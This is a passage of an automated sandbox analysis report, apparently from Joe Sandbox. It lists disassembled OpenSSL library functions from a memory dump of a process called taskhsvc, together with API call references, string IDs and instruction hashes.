                                                            • CRYPTO_free_ex_data.LIBEAY32 ref: 6CEB0576
                                                            • OPENSSL_cleanse.LIBEAY32 ref: 6CEB0586
                                                            • CRYPTO_free.LIBEAY32 ref: 6CEB058E
                                                            • EC_KEY_get_key_method_data.LIBEAY32 ref: 6CEB04D5
                                                              • Part of subcall function 6CE92200: CRYPTO_lock.LIBEAY32 ref: 6CE92241
                                                              • Part of subcall function 6CE92200: CRYPTO_lock.LIBEAY32 ref: 6CE92280
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_finishO_lock$L_cleanseO_freeO_free_ex_dataY_get_key_method_dataY_insert_key_method_data
                                                            • String ID:
                                                            • API String ID: 3521856835-0
                                                            • Opcode ID: 3633fffe26b80b1cb502b8cf95a529c3ef18a5e38c5c5df9ce0dad99c93dd48e
                                                            • Instruction ID: b7099785289a21984f624715f69ba7c486eb4a406718d9207642cfe5392fda77
                                                            • Opcode Fuzzy Hash: 3633fffe26b80b1cb502b8cf95a529c3ef18a5e38c5c5df9ce0dad99c93dd48e
                                                            • Instruction Fuzzy Hash: FF3150B15097499FD700DF65C78276BBBF4AF84308F21892CE498ABB00D774E9458BD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 8c735c0d3cf1992ed1b6b4e880ed10ec366c7b832a9fa90162874a6d87c02739
                                                            • Instruction ID: db4451872e9e2cca9f77264e38ac8838d61e7d300127ce588cf8d708d83a8b4b
                                                            • Opcode Fuzzy Hash: 8c735c0d3cf1992ed1b6b4e880ed10ec366c7b832a9fa90162874a6d87c02739
                                                            • Instruction Fuzzy Hash: 9041E8757086019FCB04DF2AC29091BB7F1BF89708F52891CE9A98B750EB31E905CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2iN1_item_i2d__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 3790965068-0
                                                            • Opcode ID: a4894f69d89c8ddcb2040693675d8f90b5696a93eaf3945ba03f0d05807e701f
                                                            • Instruction ID: 52969f7cbd4ffc65b467693733fb0b9a09fd89e56f1512b7910312ad3c1f3101
                                                            • Opcode Fuzzy Hash: a4894f69d89c8ddcb2040693675d8f90b5696a93eaf3945ba03f0d05807e701f
                                                            • Instruction Fuzzy Hash: 6B3181755097019FCB40EF39C281A4BBBF1BB99318F52991CE6A8DB704D331E9458F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_gets
                                                            • String ID:
                                                            • API String ID: 2671581957-0
                                                            • Opcode ID: e697c0e53267a0dd9d324ccffad6ffddb6e4aa3d7c9cb124a09d24be584d20b2
                                                            • Instruction ID: fcef2f508809a7e5c511f212624d1a7ccb87f40497a273ebfd88c18bf5b9adbc
                                                            • Opcode Fuzzy Hash: e697c0e53267a0dd9d324ccffad6ffddb6e4aa3d7c9cb124a09d24be584d20b2
                                                            • Instruction Fuzzy Hash: 0B41F27168C3868FC7119F398980397BBF0EF4634CF26185DC8E48B701E27A940ADB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • asn1_GetSequence.LIBEAY32 ref: 6CF2649D
                                                            • d2i_ASN1_OCTET_STRING.LIBEAY32 ref: 6CF264F9
                                                              • Part of subcall function 6CF16D50: ASN1_item_d2i.LIBEAY32(?,?,?,?,?,?,?,?,?,6CE9FE24), ref: 6CF16D7D
                                                            • ASN1_INTEGER_get.LIBEAY32 ref: 6CF2653B
                                                            • ASN1_STRING_free.LIBEAY32 ref: 6CF26592
                                                            • ERR_put_error.LIBEAY32 ref: 6CF266AB
                                                            • d2i_ASN1_INTEGER.LIBEAY32 ref: 6CF264C5
                                                              • Part of subcall function 6CF15960: ASN1_item_d2i.LIBEAY32 ref: 6CF169ED
                                                            • ASN1_STRING_free.LIBEAY32 ref: 6CF2659A
                                                            • ERR_put_error.LIBEAY32 ref: 6CF26629
                                                            • ASN1_const_check_infinite_end.LIBEAY32 ref: 6CF2664B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: G_freeN1_item_d2iR_put_errord2i_$N1_const_check_infinite_endR_getSequenceasn1_
                                                            • String ID: $A$m$y$|
                                                            • API String ID: 431162325-3658270647
                                                            • Opcode ID: 885b81101eaa0ba3c8d8bf359a8a1a259636d9cb9f3c3ebcc81e4df0bb129850
                                                            • Instruction ID: fc7f448943a2e5f8e28cbcff2fda2a877af2c59962bf187f903226f078e2d75e
                                                            • Opcode Fuzzy Hash: 885b81101eaa0ba3c8d8bf359a8a1a259636d9cb9f3c3ebcc81e4df0bb129850
                                                            • Instruction Fuzzy Hash: 6341F1756093418FD310CF69C180A5BFBF1BF89368F258A2DE9989B710D775E884CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: :$j
                                                            • API String ID: 0-2318586036
                                                            • Opcode ID: 5c9cc2193480aed73cec0435655a32427095d131fedd2d186e79df39a0971080
                                                            • Instruction ID: d8f0708172694377c15ccc0e019e571ddd4aeb31ccfe4260666ff20f810859b3
                                                            • Opcode Fuzzy Hash: 5c9cc2193480aed73cec0435655a32427095d131fedd2d186e79df39a0971080
                                                            • Instruction Fuzzy Hash: D641EFB250C3459FD7008FA9C08464BFBF1BB86718F11892EE4989BB50D77AA5498F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: ENCRYPTED PRIVATE KEY$PRIVATE KEY$h$x${
                                                            • API String ID: 4216919130-504069566
                                                            • Opcode ID: 2a3dd5d1cd812647bc13aed476c0a164ea6c066d91c6c34a2260a64cfe3436e0
                                                            • Instruction ID: 4c018155c2558cef8d050c4f2f0a0b90464a0c86bccbf50ad4e0caf3e37a771a
                                                            • Opcode Fuzzy Hash: 2a3dd5d1cd812647bc13aed476c0a164ea6c066d91c6c34a2260a64cfe3436e0
                                                            • Instruction Fuzzy Hash: DE3190756187408FC710DF6AC580A4BFBF5FB8A324F11491EEAA497300C372A9098B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: i$q
                                                            • API String ID: 0-1856866737
                                                            • Opcode ID: 5012a97e55231688991d82293bf0737d0bcfed5c7093aea526139ff678b63d00
                                                            • Instruction ID: 484d2bd85616c30583c348251a6593b751b83aca2f6c49d1b8828daeb54b8319
                                                            • Opcode Fuzzy Hash: 5012a97e55231688991d82293bf0737d0bcfed5c7093aea526139ff678b63d00
                                                            • Instruction Fuzzy Hash: 272126352087019FDB00DF25C64065BBBF5BB89308F42891CEAA8AB740D775F915CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ERR_put_error.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CEBB156), ref: 6CEBA5C5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C$~
                                                            • API String ID: 1767461275-3418904342
                                                            • Opcode ID: a017cc432f444f8e1cba48a83f72caa0b2ba9d7c16fb32eac165ee81f7b241e1
                                                            • Instruction ID: ade1270eec11d29f842b5041b1fd2d6b59edc725c6ebaa96463f861cc01e9a03
                                                            • Opcode Fuzzy Hash: a017cc432f444f8e1cba48a83f72caa0b2ba9d7c16fb32eac165ee81f7b241e1
                                                            • Instruction Fuzzy Hash: 6821BEB45493019FDB00CF29C64062BBBF0BB8A34CF11880CEAA5AB744C735E905CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ASN1_INTEGER_to_BN.LIBEAY32 ref: 6CF4CF54
                                                              • Part of subcall function 6CEFC630: BN_bin2bn.LIBEAY32 ref: 6CEFC657
                                                            • BN_bn2dec.LIBEAY32 ref: 6CF4CF62
                                                              • Part of subcall function 6CE72C90: BN_num_bits.LIBEAY32 ref: 6CE72CA9
                                                              • Part of subcall function 6CE72C90: CRYPTO_malloc.LIBEAY32 ref: 6CE72D0E
                                                              • Part of subcall function 6CE72C90: CRYPTO_malloc.LIBEAY32 ref: 6CE72D2B
                                                              • Part of subcall function 6CE72C90: BN_dup.LIBEAY32 ref: 6CE72D47
                                                              • Part of subcall function 6CE72C90: CRYPTO_free.LIBEAY32 ref: 6CE72D70
                                                              • Part of subcall function 6CE72C90: BN_free.LIBEAY32 ref: 6CE72D78
                                                            • BN_free.LIBEAY32 ref: 6CF4CF70
                                                            • ERR_put_error.LIBEAY32 ref: 6CF4CFB7
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF4CFC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_freeO_malloc$N_bin2bnN_bn2decN_dupN_num_bitsO_freeR_put_errorR_to___stack_chk_fail
                                                            • String ID: A$x
                                                            • API String ID: 1840720445-556738125
                                                            • Opcode ID: 65b03b9d07b138a2746e3a229b1fcf1ce255390e7c10d96a4984f1bbc5358767
                                                            • Instruction ID: 15cf917becafe0e4eb27bcd52ebc202cd0357f44a6ab73ecd6647192b1b2d90d
                                                            • Opcode Fuzzy Hash: 65b03b9d07b138a2746e3a229b1fcf1ce255390e7c10d96a4984f1bbc5358767
                                                            • Instruction Fuzzy Hash: 63015EB16097018BEB00AF75D54435BBBF0AB45318F11DC2CE9948B745DB39D40ACBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: df833e08da4ad7a27a29e980c6aefddc0f148ee6515af43a16793bdb96bea899
                                                            • Instruction ID: 5c99f603084b3b9a56907f6638bbea95ec3f2ffbd227d66ebfe15855476f5296
                                                            • Opcode Fuzzy Hash: df833e08da4ad7a27a29e980c6aefddc0f148ee6515af43a16793bdb96bea899
                                                            • Instruction Fuzzy Hash: A941C6356087019FCB14DF69D680A4BB7F1BB89318F42992DEAA8A7700D730F905CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • X509_CRL_INFO_it.LIBEAY32 ref: 6CF42619
                                                            • ASN1_item_sign.LIBEAY32 ref: 6CF42641
                                                              • Part of subcall function 6CEFF5E0: EVP_MD_CTX_init.LIBEAY32 ref: 6CEFF62E
                                                              • Part of subcall function 6CEFF5E0: EVP_DigestSignInit.LIBEAY32 ref: 6CEFF64E
                                                              • Part of subcall function 6CEFF5E0: ASN1_item_sign_ctx.LIBEAY32 ref: 6CEFF67E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF4265A
                                                            • X509_CRL_INFO_it.LIBEAY32 ref: 6CF42691
                                                            • ASN1_item_sign_ctx.LIBEAY32 ref: 6CF426B1
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_sign_ctxO_itX509_$DigestInitN1_item_signSignX_init__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2837452665-0
                                                            • Opcode ID: f69f1ec03c822d699df8f191fc3571ace19cf3e390a93f29da2dae5d387804ef
                                                            • Instruction ID: 8e060e011ebbfce03a3a30fe96591e0071682e7063f88bd2fef18e1d45397529
                                                            • Opcode Fuzzy Hash: f69f1ec03c822d699df8f191fc3571ace19cf3e390a93f29da2dae5d387804ef
                                                            • Instruction Fuzzy Hash: 9B31DCB49097009FCB14DF26C28480BBBF5BF89758F16891EE9989B321C770E904CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NCONF_get_section.LIBEAY32 ref: 6CF490B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: F_get_section
                                                            • String ID: A$DER:
                                                            • API String ID: 2206488356-1830918027
                                                            • Opcode ID: 0cb8fd95e90d02a4544f3a5e707770c71e6806ff665ea827682906bbf5e34395
                                                            • Instruction ID: 8b29eee559eca18e7c3da72bdcac8e345fcedc1c6bb248ad5d98113bc70042b0
                                                            • Opcode Fuzzy Hash: 0cb8fd95e90d02a4544f3a5e707770c71e6806ff665ea827682906bbf5e34395
                                                            • Instruction Fuzzy Hash: E321C2B46097019FC340DF69C58065FFBF4AF88368F11892DE99887751EB31D949CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb5f949c517c0240b32c24ff9f887cf66122bb7f63521e0e8bbe7370880006b0
                                                            • Instruction ID: fc929d5b364a37f9114e4fefefa7bb49c8ca2365e089987f85115665d51e5742
                                                            • Opcode Fuzzy Hash: eb5f949c517c0240b32c24ff9f887cf66122bb7f63521e0e8bbe7370880006b0
                                                            • Instruction Fuzzy Hash: 842134B15097518FD780EF29CA8066EBBF0AB84358F21892CE49597B80EB74D4458FC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc$O_free$M_freeM_growM_newO_getsO_reallocfwritesk_freesk_new_nullstrlen
                                                            • String ID: b
                                                            • API String ID: 1748592629-1908338681
                                                            • Opcode ID: 3200148eb1e346c6009dc23d4dd9d492ae3b124be959b92786a565c31aca08fd
                                                            • Instruction ID: 14e5819dcba30939079fbfb10b63af382b99bdd182437392c3611af8ae803620
                                                            • Opcode Fuzzy Hash: 3200148eb1e346c6009dc23d4dd9d492ae3b124be959b92786a565c31aca08fd
                                                            • Instruction Fuzzy Hash: 10111F706087049BDB10AF76C64869BBBF4AF44748F11491DE9A8CBB01EB36D844CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ENGINE_new.LIBEAY32 ref: 6CEC24FF
                                                              • Part of subcall function 6CEBBE50: CRYPTO_malloc.LIBEAY32 ref: 6CEBBE77
                                                              • Part of subcall function 6CEBBE50: CRYPTO_new_ex_data.LIBEAY32 ref: 6CEBBEBC
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_newO_mallocO_new_ex_data
                                                            • String ID:
                                                            • API String ID: 626356204-0
                                                            • Opcode ID: c7ac14b080034e193290c6b78a6947ce75b2881bc7156c0241c2fb131a110f06
                                                            • Instruction ID: 42958a71754c92e89abf584a0cf3dfeb36f39710be4c8fdc6c617bed8774d158
                                                            • Opcode Fuzzy Hash: c7ac14b080034e193290c6b78a6947ce75b2881bc7156c0241c2fb131a110f06
                                                            • Instruction Fuzzy Hash: 2411CB70A147018FCB50EF79C684A5FBBF4EB59308F52592CE6A4D7701E731E5098B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: T_free__stack_chk_failmemcmp
                                                            • String ID:
                                                            • API String ID: 3484743277-0
                                                            • Opcode ID: 79195c8247d7972d3c2bad2d33e5b0dbc6144f4cf36315ff532d9cc7321ca7c3
                                                            • Instruction ID: 4371f4341ef7bb2a82b11e9ac67862f54b957e45b47010bef968166b0d623688
                                                            • Opcode Fuzzy Hash: 79195c8247d7972d3c2bad2d33e5b0dbc6144f4cf36315ff532d9cc7321ca7c3
                                                            • Instruction Fuzzy Hash: 985151326092158FDB14CF29C5C0B0AF7F1BB8A318F699A69E954CB701D336E942CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CEF1007
                                                            • ASN1_TYPE_get_octetstring.LIBEAY32 ref: 6CEF104E
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_get_octetstring__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2759952882-0
                                                            • Opcode ID: 033d3060bc5636b8910c709adc2fd7780153bd7fbcf83ca3776954de99599810
                                                            • Instruction ID: 0b2fe51c764d0f5f717c6de5d3c20c7b1ecdff48fd6baba60be9b38860a37eeb
                                                            • Opcode Fuzzy Hash: 033d3060bc5636b8910c709adc2fd7780153bd7fbcf83ca3776954de99599810
                                                            • Instruction Fuzzy Hash: 3051C5B26097458FD710CF69C58064BB7F1FF8A368F624A1DE6A447B40D332E946CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • sk_num.LIBEAY32(?,?,?,?,?,?,00000000,?,?,00000000,6CF5B266), ref: 6CF5AF4F
                                                            • sk_value.LIBEAY32(?,?,?,?,?,?,00000000,?,?,00000000,6CF5B266), ref: 6CF5AF69
                                                            • sk_num.LIBEAY32(?,?,?,?,?,?,00000000,?,?,00000000,6CF5B266), ref: 6CF5AF7C
                                                            • sk_num.LIBEAY32(?,?,?,?,?,?,00000000,?,?,00000000,6CF5B266), ref: 6CF5AF94
                                                            • sk_value.LIBEAY32(?,?,?,?,?,?,00000000,?,?,00000000,6CF5B266), ref: 6CF5AFAA
                                                            • sk_num.LIBEAY32(?,?,?,?,?,?,00000000,?,?,00000000,6CF5B266), ref: 6CF5AFC2
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_num$sk_value
                                                            • String ID:
                                                            • API String ID: 354181917-0
                                                            • Opcode ID: 6d9ff3dd262567ec9d8966423a7dd6b9c9773b80c60822b1614002ae2be2367a
                                                            • Instruction ID: 780d2c4248a9df1eaf87173703cfbc8a87b84462ac3e1f4925dc16433c329bfc
                                                            • Opcode Fuzzy Hash: 6d9ff3dd262567ec9d8966423a7dd6b9c9773b80c60822b1614002ae2be2367a
                                                            • Instruction Fuzzy Hash: BB316E756056058FD7109F75C4C076BB3F0AB68308FA6492CE7A5C7B00E731E865DBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: afa9a056e76f040ccc093820b0ec8006a18a90d0ed052e83d2901c4d42514cdc
                                                            • Instruction ID: c1db2da6f9a29defb05ac9abc20c65130b2065288060654785bf4dd2d4b2783c
                                                            • Opcode Fuzzy Hash: afa9a056e76f040ccc093820b0ec8006a18a90d0ed052e83d2901c4d42514cdc
                                                            • Instruction Fuzzy Hash: 2841DB356146409FDB10EF69C680A0BB7F1FB89318F46DA5CEAA8DB305D334E9058F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 7960f7f2c172abf422e1255c826e9c93084f09242184392308745f4e2f30fa4d
                                                            • Instruction ID: 58e5ea450ea97cc18dc4f8cd8b42fb3365fc5c2804f9ca8d552a90a08cc633e6
                                                            • Opcode Fuzzy Hash: 7960f7f2c172abf422e1255c826e9c93084f09242184392308745f4e2f30fa4d
                                                            • Instruction Fuzzy Hash: A6314F716186008FDB10DF29D980A5BBBF1FB89318F42895DE6A49B740E735E904CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NCONF_get_section.LIBEAY32 ref: 6CF48D97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: F_get_section
                                                            • String ID: A$DER:
                                                            • API String ID: 2206488356-1830918027
                                                            • Opcode ID: 6a2f089fab0a5d4f72b1997e659e7d9b42b4ba3f3c497310a475a474546ed83f
                                                            • Instruction ID: 5d1528bb9bb2cd3a8d69b2266f9849f18726ed5ed504ccbbeeb040ca17b75460
                                                            • Opcode Fuzzy Hash: 6a2f089fab0a5d4f72b1997e659e7d9b42b4ba3f3c497310a475a474546ed83f
                                                            • Instruction Fuzzy Hash: DD21E4B16097018FD740EF69C48066BBBF0AF98358F11892EE998C7B51E774D885CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NCONF_get_section.LIBEAY32 ref: 6CF48F07
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: F_get_section
                                                            • String ID: A$DER:
                                                            • API String ID: 2206488356-1830918027
                                                            • Opcode ID: f343df614e8ba2ffed2b1716be059d73f472a6bbab4604ef68198c1074239db6
                                                            • Instruction ID: 2741ff1790d37f0b4ceb06a83f4a376525d4f7ff546333d6ed6ff0cf42359c97
                                                            • Opcode Fuzzy Hash: f343df614e8ba2ffed2b1716be059d73f472a6bbab4604ef68198c1074239db6
                                                            • Instruction Fuzzy Hash: 882105B16087028FD340EF69C08065FBBE1AB88368F11892EE998C7751D775D845CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_print_exN1_item_freeX509___stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2718718610-0
                                                            • Opcode ID: e2d7f0c5a9c6c351c02f85b5a6bf5f877ddf8e764b5376d17e1bd3a7363cff2a
                                                            • Instruction ID: d0e28ed230d2a67e571e594f76b65f3d43991ad2f2b1835cf82595f14fe0cd55
                                                            • Opcode Fuzzy Hash: e2d7f0c5a9c6c351c02f85b5a6bf5f877ddf8e764b5376d17e1bd3a7363cff2a
                                                            • Instruction Fuzzy Hash: B031A475A196419FCB10DF29C680A4BBBF1BB89718F02991DEAA4DB700D730E9059F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$S
                                                            • API String ID: 0-2375278349
                                                            • Opcode ID: bc4cd32eaf2a2cb3355f9c491ecb477e4495b25c9ef531cf4a9a1c5e85b8ff2e
                                                            • Instruction ID: 9a1aec01ee4f20a6629f5df9b393e294ff550566eb16847756f8fe0f67cf0724
                                                            • Opcode Fuzzy Hash: bc4cd32eaf2a2cb3355f9c491ecb477e4495b25c9ef531cf4a9a1c5e85b8ff2e
                                                            • Instruction Fuzzy Hash: 7721A17166A7118BDB109F25C1C066FB7F0AF64748F91582EDA948BB80DB30DC55CBD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_printf$O_ctrlO_mallocO_newO_s_file__stack_chk_fail
                                                            • String ID: j
                                                            • API String ID: 213212730-2137352139
                                                            • Opcode ID: 9c876ec898b1c19df56ffb42426a2dcf9b693b9d97ad5a057f76df31dd411723
                                                            • Instruction ID: a4611a8b34245ab9885265c179400a03da352af62f5fd8c33dba14041cb06500
